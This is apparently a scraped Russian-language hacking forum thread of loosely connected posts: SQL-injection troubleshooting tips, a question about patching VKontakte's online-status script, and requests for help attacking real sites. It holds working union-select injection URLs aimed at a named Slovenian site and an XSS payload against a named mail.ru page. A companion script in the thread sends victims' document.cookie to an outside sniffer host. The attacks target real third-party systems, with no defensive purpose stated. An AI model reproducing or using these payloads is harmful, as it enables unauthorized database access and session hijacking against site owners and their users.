мда, информации море: 1. Для вывода одного параметра concat нафинг не нужен (тогда уже group_concat) 2. Проверить правильность написания именя поля + имени таблицы 3. Попробуй unhex(hex(tp)) 4. Ссылку в студию или в личку 5. "кроме всяческих ошибок" - текст ошибок когда в студии - 99% успешных подсказок. 6. Пустая табла - пробуй считать - -24+union+select+1,count(tp)+from+events-- по п.6 - скорее всего 0 выведет
Заканчивай с гаданием. Без линка на вопрос не ответить. Я готов поспорить, что там всё элементарно, и тебе уже ответили на вопрос. Не хочешь сюда линк, кто-то там в приват просил, а гадания на 10 страниц ни к чему https://forum.antichat.ru/thread104591.html вопросы 2.3.4. Если после прочтения ответов на эти вопросы ничего не получится , линк или сюда или в ПМ. Я это писал для того, что-бы вопросы по кругу не ходили, но видимо бесполезно потратил время
Как быть ofline на vkontakte.ru Нагуглил, что проблема решается, если не трогать скрипт profile.php, то есть не заходить на свою страницу и на страницы других пользователей. Но вот вопрос возникает. Как я понимаю сам этот скрипт находится в отдельном файле где-то в кеше и при загрузки странички пользователя он просто исполняется и отправляет инфу о том, что ты онлайн. Но если он находится в кеше стало быть его можно пропатчить что-бы он как бы исполнялся но инфу не отправлял. Честно говоря я ничего не понимаю в этой системе. это всё только мои догадки. Если что-то не так то поправьте меня. Понятно, что можно тупо не заходить на страницы пользователей, но хочется именно заходить и быть offline. Где под firefox 3 в ubuntu можно найти сам этот profile.php ?
Подскажите здесь есть вывод данных - http://www.sklad-kadri.si/kadrovske/?k=izpis&id=5061112000123123+union+select+1,2,3,4,5,6--+ ?
Тут: Code: http://www.sklad-kadri.si/kadrovske/?k=izpis&id=-5061112000123123+union+select+1,2,3,4,5,6,7,8,9,0,11,12/*
Вопрос: допустим я нашол XSS - http://torg.mail.ru/news/?0103/2009"><script>alert(document.cookie)</script> Вопрос, как её заносить в ссылку на моём хосте по которой должен отклик от жертвы произойти, со скриптом ("><script>alert(document.cookie)</script>) или без ?????
Т.е. выглядеть будет примерно так???: http://torg.mail.ru/news/?0103/2009"><script>alert(document.cookie)</script>'><script src=http://miliniva.narod.ru/js.js></script> А в Js.js: img=new Image();img.src="http://antichat.org/s/Seshh.gif?"+document.cookie;